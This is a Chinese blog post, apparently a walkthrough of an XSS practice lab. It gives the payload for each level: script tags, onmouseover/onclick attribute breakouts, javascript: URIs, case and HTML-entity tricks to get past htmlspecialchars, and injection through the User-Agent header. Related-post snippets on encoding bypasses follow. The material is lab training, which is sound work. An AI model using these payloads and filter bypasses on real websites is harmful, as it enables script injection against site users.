XSS靶场

于 2024-06-28 17:24:59 发布
阅读量310 收藏 8
点赞数 5
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52333044/article/details/140049283
版权

level1

输入<script>alert("xxs");</script>

level2

对input进行闭合

输入"><script>alert("xxs");</script>

level3

查看源代码是

使用了htmlspecialachars,所有不能使用/或者>

这里使用play:' 

但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果

的payload为:' οnmοuseοver='alert(/xss/) //其他payload省略

level4

和一样使用了htmlspecialachars,这里使用"进行闭合

" οnmοuseοver=" alert(/xss/)

level5

poc :"><a href="javascript:alert(1)">test</a>

level6

可以使用大小绕过

poc:"><Script>alert("xxs");</Script>

level8

poc:javascri&#x70;t:alert(1)

使用html实体编码绕过

level9

判断输入的是否有http://

poc:javascri&#x70t:alert(/xxs/)//http://

level10

找到隐藏参数:

t_sort

然后poc:

t_sort=xss" οnclick=alert(/xss/) type="text"

查看源代码是有t_sort参数的

然后这个input是hidden隐藏的,我们要设置text

所有poc:t_sort=xss" οnclick=alert(/xss/) type="text"

level12

使用user-Agent: xxs" οnclick="alert(1)

level13

可以使用cookie进行破坏

level16

对script, 空格 ,/进行替换

可以使用编码

<img

src=xss

οnmοuseοver=alert('xss')>

url编码然后绕过

level17

全部被实体化

但是embed标签 可以插入事件

所有直接插入:

οnmοuseοver=alert('xss')

level18

一样的对输入的数据全部实体化,还是可以插入οnmοuseοver=alert('xxs')

当鼠标移动到这个位置然后弹出窗口

level19

以上面一样的方法

殇ベ言清欢
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验31:xsshtmlspecialchars绕过演示
qq_44720671的博客
04-29 2124
htmlspecialchars绕过 htmlspecialchars()函数把预定义字符转换成HT,L实体 预定义字符为: 1、& (和 )&amp(编码) 2、” (双引号)&qupt 3、’ (单引号)&#039 4、< (小于) &It 5、> (大于) &gt 可用引号类型: ENT_COMPAT—默认,仅编码双引号 ENT...
常见html中的绕过标签,技巧集合
weixin_41821465的博客
04-28 541
在学习编码绕过时由于数量多,类型相似,不太容易记得住,记得全,故做此记录。1。
绕过html编码,浏览器的自解码机制(用于XSS编码绕过
weixin_35280108的博客
06-20 706
1.浏览器大致的工作流程(1)浏览器解析HTML(2)标签转化为DOM节点,识别标签时,HTML解析器无法识别被实体编码的内容,在建立起DOM树,才能对每个节点的内容进行识别(3)JS DOM API(JS解析器)参与,对DOM树进行修改,改变其内容。此时CSS解析器解析外部CSS及style标签,一起构成rendering tree==(4)这里CSS在构造rendering tree之前,会有...
【漏洞发现-xss跨站脚本攻击】实体编码绕过
m0_46344990的博客
05-28 3025
一、漏洞描述 xss跨站脚本攻击是黑客通过“html注入”篡改了网页,插入了js恶意脚本,前端渲染时进行恶意代码执行,从而控制用户浏览的一种攻击。经常出现在需要用户输入的地方,一旦对输入不进行处理,就会发生网页被篡改。 分为三类 反射型:经过后端,不经过数据库 存储型:经过后端,经过数据库 DOM型:不经过后端,是基于文档对象型的一种漏洞,dom-xss是通过url参数去控制触发的 xss靶场第八关服务器采用了替换恶意关键字的方式防御,对输入进行小写转化,可以使用实体编码绕过服务器检测,当传回浏
3-11xsshtmlspecialchars绕过演示
山兔的博客
04-29 1645
我们这篇文章,说一下php里面用的比较多的一个方法,那就是htmlspecialchars()函数 xss关键防范措施其中一个关键的地方,就是我们在输出的时候,要做前端实体的转义 XSS绕过-关于htmlspecialchars()函数 htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。 预定义的字符是:  & (和号)成为 &amp  " (双引号)成为 &quot  ' (单引号)成为 &#039  < (小于)成为 &
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
最新发布
2401_84297796的博客
04-26 730
作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「专栏简介」: 此文章已录入专栏。
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
xss实战,xss靶场通关详解
maluxiao123的博客
04-02 2042
第一关:我们发现页面上没有任何可以输入的地方 但是发现url中有参数传递为test,而页面上也显示了test,所以说,传入的参数可以显示到页面上。 使用f12控制台查看原代码 我们传入<script></script> 这里可以发现,原本来的test不见了,按理来说应该会出现欢迎用户<script></script>才对,但是没有,到哪里去了,没错,他被浏览器解析了,在这个标签中就可以插入你想执行的js代码 我们由于靶场需要弹窗才能进入下一关,所以传入&
耗子的XSS靶场wp
qq_40710190的博客
07-29 722
耗子的XSS靶场wp 靶场传送门 GitHub仓库传送门 0x00 非常简单的一关 function render (input) { return '<div>' + input + '</div>' } 直接通关 <script>alert(1)</script> 0x01 这一关使用了textarea来将我们的输入转成文本 function render (input) { return '<textarea>' + input
XSS靶场level15详细通关教程
m0_49434302的博客
07-07 1771
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场。可是做到第15关的时候,怎么也无法通关。我这个朋友在15关卡住了2天。最后终于找到了问题的根源。【这个朋友使用的是在线靶场,如果你是自己搭建的靶场不会遇到我的问题,只需阅读前半部分即可。】 第一步:查看源码 注意到了一个新朋友:ng-include。 ng-include 指令用于包含外部的HTML文件。包含的内容将作为指定元素的子节点。ng-include属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一域
HTML编码方法总结,常用
03-16
自己总结的小经验,很基础,将一些专业素养的,英文解释也放进去了。可以参考。平时忘了什么就瞅瞅,大佬们可以查阅一下。平时下载可以用来复习或者挑选。
绕过html编码,编码绕过问题
weixin_28973855的博客
06-20 593
在bwapp上尝试xss注入时,在level3层次上,后台用了htmlspecialchars函数编码转义,没有办法绕过。网上搜索后,给出的结论是,函数对&,',",进行了转义,其本身没法绕过,但是视它所处的环境来定。比方说,hellodocument.getElementById("1").innerHTML = x;注意这个x变量,它首先是在script环境下,然后通过改变dom结构,...
xss绕过编码绕过
m0_63581584的博客
06-03 2531
xss编码绕过 首先我们知道解析顺序,URL解码,HTML解码 ,CSS解码,JS解码 1.在服务端接受到请求后,一般是先进行url解码,然后在提取浏览器中参数。所以一般url编码是不能绕过。 2.如果我们输入了带有HTML实体编码值,只要在保证浏览器接受数据时能构建DOM树,就能进行解码操作。 下面为什么会进行url编码,不是为了绕过而进行的,因为HTML实体编码后(&#x63);会是这种情况。而浏览器在发送到服务端传参也是&进行传参分隔的,所以就会产生问题.我们就要进行url编码 3.我
xss绕过htmlspecialchars实体编码的姿势
weixin_33755649的博客
07-17 3734
倘若是在script、input标签当中,即可突破。Payload ' oninput=alert`1` //      当要在input中输入内容时触发事件' oninput=alert`1` '       同上' onchange=alert`1` //  发生改变的时候触发该事件' onchange=alert`1` '   同上 在script里直接alert  ...
pboot 将编码转换为实体html_xss编码绕过详解
weixin_39982452的博客
01-04 287
前言本篇文章属于转载,转载链接为https://blog.csdn.net/qq_41631096/article/details/104747992,本篇文章写的通俗易懂,分析到位,如果喜欢可以多看看原文。xss编码绕过详解(更像是在介绍实体编码和JS编码的解析过程)注:本文通过研究各种情况下实体编码和JS编码是否生效,进而总结了哪些情况下能够进行编码后,javascript代码依然能...
Web常用编码以及攻击绕过笔记
gc_msc的博客
07-25 5336
一、URL编码 形式:“%”加上ASCII码(先将字符转换为两位ASCII码,再转为16进制),其中加号“+”在URL编码中和“%20”表示一样,均为空格。 当遇到非ASCII码表示的字符时,如中文,浏览器或通过编写URLEncode,根据UTF-8、GBK等编码16进制形式,进行转换。如“春”的UTF-8编码为E6 98 A5,因此其在支持UTF-8的情况下,URL编码为%E6%98%A5。
xss编码绕过而学习的实体编码、js编码适用环境
不想当脚本小子的脚本小子
02-12 134
有道云笔记链接:http://note.youdao.com/noteshare?id=3d4163c2923836cdb32d3303059b20d1&sub=C900F6E6D0EC40489225B5E4EDEE7A8C
centos7删除xss靶场
07-25
要删除CentOS 7上的XSS靶场,按照以下步骤进行操作: 1. 首先,登录到CentOS 7服务器。 2. 找到XSS靶场的安装目录。通常情况下,靶场的文件会存储在/var/www/html/或/opt目录下。你可以使用以下命令来查找: ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值